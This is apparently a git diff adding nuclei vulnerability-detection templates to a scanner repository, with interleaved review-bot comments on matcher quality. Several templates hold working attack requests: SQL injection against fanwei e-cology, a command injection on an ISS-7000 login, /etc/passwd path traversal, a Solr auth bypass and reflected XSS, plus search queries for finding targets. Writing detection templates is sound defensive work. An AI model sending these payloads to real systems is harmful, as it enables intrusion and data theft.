./poc/wordpress/wp-auto-affiliate-links-2b6385621ba694838cffc951e0cd217e.yaml ./poc/wordpress/wp-auto-affiliate-links-3c5d91d8dc34d598b50cb95a7c44d63d.yaml ./poc/wordpress/wp-auto-affiliate-links-4468e188d3242885a0164e80befda644.yaml @@ -141505,6 +141854,7 @@ ./poc/wordpress/wp-donate-da3f0f16feb56d7497b76972109fd5c9.yaml ./poc/wordpress/wp-donate.yaml ./poc/wordpress/wp-donimedia-carousel-3ee6db1ee25b24e0072c18227982adb0.yaml +./poc/wordpress/wp-donimedia-carousel.yaml ./poc/wordpress/wp-donottrack-6aad08d4158c4571f0f40ff372bdaba5.yaml ./poc/wordpress/wp-donottrack-a4541373636ec471e3e2bd26a80cde61.yaml ./poc/wordpress/wp-donottrack-a97e14f40e38e3a1337c554459e04ffc.yaml 
@@ -142558,17 +142908,23 @@ ./poc/wordpress/wp-job-openings.yaml ./poc/wordpress/wp-job-portal-01f968db5483a0b7e206fc18507075c8.yaml ./poc/wordpress/wp-job-portal-08bfb4b123d4a75d849c2255041b9f92.yaml +./poc/wordpress/wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml ./poc/wordpress/wp-job-portal-12c945b509573fbebe58ec8bd17dacc1.yaml ./poc/wordpress/wp-job-portal-3ed29051521d7b123afa881d9f582a09.yaml +./poc/wordpress/wp-job-portal-44ca926d802c7e810b6f185672896cf3.yaml ./poc/wordpress/wp-job-portal-58dafb39f01c57b90c9e86a2242739b8.yaml ./poc/wordpress/wp-job-portal-6991636be674dec0e6ae129f466cf764.yaml ./poc/wordpress/wp-job-portal-715d52378457a7ac370cc45a9dc1e067.yaml ./poc/wordpress/wp-job-portal-86811d18d4d789d537deb1f6ba496b4c.yaml ./poc/wordpress/wp-job-portal-a5bdc2b0068a1c535dc51453d211dcd6.yaml +./poc/wordpress/wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52.yaml +./poc/wordpress/wp-job-portal-ae4beac744bf60cad4d49b935292f33a.yaml ./poc/wordpress/wp-job-portal-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-job-portal-d51f4fd87b69ac765648da293bd32a31.yaml +./poc/wordpress/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml ./poc/wordpress/wp-job-portal-f30a1250ca423391f4cfcfaaf18957f1.yaml ./poc/wordpress/wp-job-portal-f7ec98d69a0944149a1d98bba86a2fe9.yaml +./poc/wordpress/wp-job-portal-fa33fbce4070912e4a2de446cc7f9493.yaml ./poc/wordpress/wp-job-portal-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-job-portal-plugin.yaml ./poc/wordpress/wp-job-portal.yaml @@ -143354,6 +143710,7 @@ ./poc/wordpress/wp-photo-effects-ca7fd9aea5cc20f637f6d935b1fd3bd7.yaml ./poc/wordpress/wp-photo-effects.yaml ./poc/wordpress/wp-photo-text-slider-50-952a4b7410320a762fcfe741f0ebcebf.yaml +./poc/wordpress/wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b.yaml ./poc/wordpress/wp-photo-text-slider-50.yaml ./poc/wordpress/wp-php-widget-e27de43f3c3dd5df388335d72559f433.yaml ./poc/wordpress/wp-php-widget.yaml 
@@ -144652,6 +145009,7 @@ ./poc/wordpress/wp-tinymce-lfi.yaml ./poc/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml ./poc/wordpress/wp-tithely-fa54958de0b95d943c97eef399cbadee.yaml +./poc/wordpress/wp-tithely.yaml ./poc/wordpress/wp-tmkm-amazon-1523dfa46e6cef9963464f327801e736.yaml ./poc/wordpress/wp-tmkm-amazon.yaml ./poc/wordpress/wp-to-buffer-57da4de511c877c38dd35e63b1bf95b6.yaml @@ -145323,6 +145681,7 @@ ./poc/wordpress/wpcargo-c8e77c2f7459cf7f7794c40d82f220a1.yaml ./poc/wordpress/wpcargo.yaml ./poc/wordpress/wpcasa-639a6c2d23467f866364578ced73357f.yaml +./poc/wordpress/wpcasa.yaml ./poc/wordpress/wpcb-6dbaf5cc33a2e3921e359ba2f93b22fd.yaml ./poc/wordpress/wpcb.yaml ./poc/wordpress/wpcf7-recaptcha.yaml diff --git a/poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml b/poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml new file mode 100644 index 0000000000..2c70d7a8b4 --- /dev/null +++ b/poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml @@ -0,0 +1,29 @@ +id: fanwei-Ecology-LoginSSO-sqli + +info: + name: fanwei-Ecology-LoginSSO-sqli + author: PokerSec + severity: high + metadata: + fofasearch: app="泛微-OA(e-cology)" + +requests: + - raw: + - |+ + GET /weaver/FileDownloadLocation/login/LoginSSO.%2520jsp?ddcode=7ea7ef3c41d67297&mrfuuid=1%27;if+db_name(1)=%27master%27+WAITFOR+delay+%270:0:3%27--+&mailid=0&a=.swf HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + + matchers: + - type: dsl + condition: and + dsl: + - duration > 3 && duration < 6 && status_code==302 + + + + extractors: + - type: dsl + dsl: + - duration \ No newline at end of file diff --git a/poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml b/poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml new file mode 100644 index 0000000000..1abd80a6f3 --- /dev/null +++ b/poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml 
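Review bot: The only matcher in `fanwei-Ecology-LoginSSO-sqli.yaml`, `duration > 3 && duration < 6 && status_code==302`, rests on a single timing sample, so any slow host that answers this path with a redirect is reported as SQL injection. Send an undelayed baseline request first and require the delayed response to be slower than that baseline by roughly the injected delay; this removes most latency-driven false positives. The template also uses the older `requests:` key while most templates in this commit use `http:`, so switching keeps the set consistent.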
@@ -0,0 +1,22 @@ +id: hamlintek-ISS-7000-login_handler-rce + +info: + name: hamlintek-ISS-7000-login_handler-rce + author: PokerSec + severity: critical + metadata: + fofasearch: body="css/login_form_style-06.css" + +http: + - raw: + - | + POST /login_handler.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=admin;id;&uilng=3&button=%E7%99%BB%E5%85%A5&Signin= + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"uid=0") && contains_all(body,"gid=0") && contains_all(header,"ISS-7000 v2") diff --git a/poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml b/poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml new file mode 100644 index 0000000000..da1d397ffa --- /dev/null +++ b/poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml 
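Review bot: The `info` block of `hamlintek-ISS-7000-login_handler-rce.yaml` has no `description`, `reference` or `tags`, so a `critical` finding arrives with nothing to triage it against and tag-based selection cannot reach it. Add a `description` stating what the visible request and matcher check, for example `description: Command injection via the password field of login_handler.cgi; the check looks for root uid/gid in the response of an ISS-7000 v2 device.`, plus a `reference` to the advisory it came from. The other PokerSec templates in this commit (fanwei LoginSSO, mingyuanyun GetErpConfig, solr PKIAuthenticationPlugin, yongyou-BIP, fanwei browser) have the same gap.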
@@ -0,0 +1,59 @@ +id: ider-login-77ccffccfac1bb6eac46823913cc705c + +info: + name: > + IDer Login for WordPress <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/de602cf8-cc02-4459-aa23-5d8236048bca?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ider-login/" + google-query: inurl:"/wp-content/plugins/ider-login/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ider-login,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ider-login/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ider-login" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1') \ No newline at end of file diff --git a/poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml b/poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml new file mode 100644 index 0000000000..370bcc7cbf --- /dev/null +++ b/poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml @@ -0,0 +1,20 @@ +id: mingyuanyun_ERP_GetErpConfig_unauthorized + +info: + name: mingyuanyun_ERP_GetErpConfig_unauthorized + author: PokerSec + severity: high + metadata: + fofasearch: body="报表服务已正常运行" + + +http: + - raw: + - | + GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"AdminUserCode") && contains_all(body,"ErpKey") \ No newline at end of file 
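Review bot: The `info` block of `ider-login-77ccffccfac1bb6eac46823913cc705c.yaml` ships with generator placeholders left empty: `description: >` has no text, `cvss-metrics`, `cvss-score` and `cve-id` have no values, and `shodan-query: 'vuln:'` has no identifier, yet `tags` begins with `cve`. Fill these from the referenced Wordfence advisory, or drop the empty keys and the `cve` tag so CVE-based filtering does not select a record with no identifier. `poc/backup/indeed-wp-superbackup.yaml` in this commit has the same empty fields. The match also rests only on the `Stable tag` line of readme.txt, so a hit means "version string <= 2.1" rather than a confirmed issue, and the description should say so.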
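Review bot: `mingyuanyun_ERP_GetErpConfig_unauthorized.yaml` is added twice in this commit, under `poc/auth/` and again under `poc/config/`, with the same blob (`370bcc7cbf`) and the same `id`. Running the whole tree sends the request twice and reports duplicate findings under one id. Keep a single copy, or give the copies distinct ids if the directory layout really needs both. poc.txt shows the same pattern for the two fanwei-Ecology templates, which are also listed under `poc/sql_injection/`.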
diff --git a/poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml b/poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml new file mode 100644 index 0000000000..3d7b08cba0 --- /dev/null +++ b/poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml @@ -0,0 +1,21 @@ +id: solr-PKIAuthenticationPlugin-admin-bypass + +info: + name: solr-PKIAuthenticationPlugin-admin-bypass + author: PokerSec + severity: high + metadata: + fofasearch: app="APACHE-Solr" + +requests: + - raw: + - |+ + GET /solr/admin/info/properties:/admin/info/key HTTP/1.1 + Host: {{Hostname}} + SolrAuth: XXXXX + + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"system.properties") && contains_all(body,"Eclipse Adoptium") \ No newline at end of file diff --git a/poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml b/poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml new file mode 100644 index 0000000000..018aa72ff8 --- /dev/null +++ b/poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml @@ -0,0 +1,19 @@ +id: yongyou-BIP-nginx-lua-fileread + +info: + name: yongyou-BIP-nginx-lua-fileread + author: PokerSec + severity: critical + metadata: + fofasearch: "iuap-apcom-workbench/" + +http: + - raw: + - | + GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg.js HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - contains_all(body,"root:x") && status_code==200 && contains_all(body,"daemon:x") && contains_all(body,"Password","ArrayOfOlapConnection") \ No newline at end of file diff --git a/poc/backup/indeed-wp-superbackup.yaml b/poc/backup/indeed-wp-superbackup.yaml new file mode 100644 index 0000000000..56b18b8b9e --- /dev/null +++ b/poc/backup/indeed-wp-superbackup.yaml 
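Review bot: The matcher in `solr-PKIAuthenticationPlugin-admin-bypass.yaml` requires `contains_all(body,"Eclipse Adoptium")`, which names one JDK vendor rather than anything specific to Solr. An instance running on another Java distribution would presumably return the same properties page and still be reported as clean. Match on JVM-independent content instead, for example `status_code==200 && contains_all(body,"system.properties","java.version")`, after confirming the key against a real response. The `info` block also does not say which Solr releases are affected.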
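Review bot: The matcher in `yongyou-BIP-yonbiplogin-fileread.yaml` ANDs `contains_all(body,"Password","ArrayOfOlapConnection")` with the `root:x` and `daemon:x` checks. Those two strings are not passwd-file content and look carried over from another template, so as written the check can hardly ever fire and the result is a silent false negative. Dropping the clause, `status_code==200 && contains_all(body,"root:x","daemon:x")`, leaves the condition the request is evidently meant to test. The `id` and `name` (`yongyou-BIP-nginx-lua-fileread`) also differ from the file name, which makes a finding hard to trace back to this file.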
@@ -0,0 +1,59 @@ +id: indeed-wp-superbackup-617a1d8a65bee9cf7b98f71587d5bbf1 + +info: + name: > + Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/indeed-wp-superbackup/" + google-query: inurl:"/wp-content/plugins/indeed-wp-superbackup/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,indeed-wp-superbackup,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-wp-superbackup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-wp-superbackup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml b/poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml new file mode 100644 index 0000000000..85846ae883 --- /dev/null +++ b/poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml 
@@ -0,0 +1,28 @@ +id: fanwei-Ecology-browser-sqli + +info: + name: fanwei-Ecology-browser-sqli + author: PokerSec + severity: high + metadata: + fofasearch: app="泛微-OA(e-cology)" + +requests: + - raw: + - |- + POST /mobile/%20/plugin/browser.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%
37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%32%25%33%37%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - countSql + - baseSql + - type: status + status: + - 200 diff --git a/poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml b/poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml new file mode 100644 index 0000000000..370bcc7cbf --- /dev/null +++ b/poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml @@ -0,0 +1,20 @@ +id: mingyuanyun_ERP_GetErpConfig_unauthorized + +info: + name: mingyuanyun_ERP_GetErpConfig_unauthorized + author: PokerSec + severity: high + metadata: + fofasearch: body="报表服务已正常运行" + + +http: + - raw: + - | + GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"AdminUserCode") && contains_all(body,"ErpKey") \ No newline at end of file diff --git a/poc/cve/CVE-2011-5107-2102.yaml b/poc/cve/CVE-2011-5107-2102.yaml new file mode 100644 index 0000000000..e39df48274 --- /dev/null +++ b/poc/cve/CVE-2011-5107-2102.yaml 
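Review bot: The `words` matcher in `fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml` lists `countSql` and `baseSql` without `condition: and`. A word matcher defaults to OR, so a 200 response containing either string alone is reported; add `condition: and` to that matcher if a vulnerable response is expected to contain both. The `keyword` value is a multiply URL-encoded blob and nothing in `info` says what it decodes to, so a reviewer or scan operator cannot tell what statement is sent to the target; add a one-line `description` stating its intent. The `id` also omits the CNVD number that the file name carries.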
@@ -0,0 +1,29 @@ +id: CVE-2011-5107 +info: + name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/ + tags: cve,cve2011,wordpress,xss,wp-plugin + classification: + cve-id: CVE-2011-5107 +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/CVE-2014-4536-2354.yaml b/poc/cve/CVE-2014-4536-2354.yaml new file mode 100644 index 0000000000..b2485663df --- /dev/null +++ b/poc/cve/CVE-2014-4536-2354.yaml 
@@ -0,0 +1,41 @@ +id: CVE-2014-4536 + +info: + name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. + reference: + - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f + - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 + - http://wordpress.org/plugins/infusionsoft/changelog + - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-4536 + cwe-id: CWE-79 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/CVE-2014-9094-2422.yaml b/poc/cve/CVE-2014-9094-2422.yaml new file mode 100644 index 0000000000..8e73d7da9b --- /dev/null +++ b/poc/cve/CVE-2014-9094-2422.yaml 
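Review bot: In `CVE-2014-4536-2354.yaml` the `name` gives the affected range as `< 1.5.7` while the `description` says "before 1.5.6", so the two lines disagree on the fixed version. Align both with the NVD entry already listed under `reference`, so a reader comparing an installed version against the finding gets one answer.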
@@ -0,0 +1,29 @@ +id: CVE-2014-9094 + +info: + name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + author: daffainfo + severity: medium + description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + tags: cve,cve2014,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2015-2807-2500.yaml b/poc/cve/CVE-2015-2807-2500.yaml new file mode 100644 index 0000000000..b39565c245 --- /dev/null +++ b/poc/cve/CVE-2015-2807-2500.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2015-2807 + +info: + name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 + tags: cve,cve2015,wordpress,wp-plugin,xss + description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2017-17043-2977.yaml b/poc/cve/CVE-2017-17043-2977.yaml new file mode 100644 index 0000000000..027f5d2142 --- /dev/null +++ b/poc/cve/CVE-2017-17043-2977.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2017-17043 + +info: + name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 + + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17043 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2019-25221.yaml b/poc/cve/CVE-2019-25221.yaml new file mode 100644 index 0000000000..99e90b3a73 --- /dev/null +++ b/poc/cve/CVE-2019-25221.yaml 
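Review bot: `CVE-2017-17043-2977.yaml` has no `tags:` line, unlike the other four XSS templates by the same author added in this commit, so tag-based selection on `cve`, `wordpress` or `xss` would skip it. Add `tags: cve,cve2017,wordpress,wp-plugin,xss` to `info`, following the pattern of the sibling files. `cvss-score: 6.10` would also be more consistent with the other templates as `6.1`.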
@@ -0,0 +1,59 @@ +id: CVE-2019-25221-86298068dfd5127aa948cb7fa748c15a + +info: + name: > + Responsive Filterable Portfolio <=1.0.8 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The Responsive Filterable Portfolio plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97827e26-d418-4c96-b0d0-10b92a4513bd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2019-25221 + metadata: + fofa-query: "wp-content/plugins/responsive-filterable-portfolio/" + google-query: inurl:"/wp-content/plugins/responsive-filterable-portfolio/" + shodan-query: 'vuln:CVE-2019-25221' + tags: cve,wordpress,wp-plugin,responsive-filterable-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/responsive-filterable-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "responsive-filterable-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.8') \ No newline at end of file 
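Review bot: Detection in this template rests only on the `Stable tag` line of `readme.txt`, tested with `compare_versions(version, '<= 1.0.8')`, so a match shows which version the readme advertises and not that the SQL injection is reachable; a comment should say so, for example `# version-based detection only; confirm the installed plugin version before triage`. The metadata also disagrees with itself: the name says "Authenticated (Admin+)" and the vector has `PR:L`, while the description speaks of unauthenticated attackers, and `severity: low` sits beside `cvss-score: 6.5`. The two `version` extractors are identical apart from `internal: true`, so one looks redundant unless the second is kept on purpose to print the version. The other readme-based templates in this commit (CVE-2020-11023, CVE-2023-24407, CVE-2023-49196 and the CVE-2024-10xxx files) follow the same pattern, and several of them pair `severity: low` with a 6.4 score.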
diff --git a/poc/cve/CVE-2020-11023.yaml b/poc/cve/CVE-2020-11023.yaml new file mode 100644 index 0000000000..dac97e4330 --- /dev/null +++ b/poc/cve/CVE-2020-11023.yaml @@ -0,0 +1,59 @@ +id: CVE-2020-11023-3beb604b5149be28498143011514aa9e + +info: + name: > + jQuery Manager for WordPress <= 1.10.4 - Running Vulnerable Dependency + author: topscoder + severity: medium + description: > + The jQuery Manager for WordPress plugin for WordPress is running a vulnerable version of jQuery in all versions up to, and including, 1.10.4. This makes it possible for unauthenticated attackers to malicious web scripts, though it is not verified that the plugin is exploitable through CVE-2020-11023. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/21a27a8b-f599-42b9-9439-4456995dd3fe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2020-11023 + metadata: + fofa-query: "wp-content/plugins/jquery-manager/" + google-query: inurl:"/wp-content/plugins/jquery-manager/" + shodan-query: 'vuln:CVE-2020-11023' + 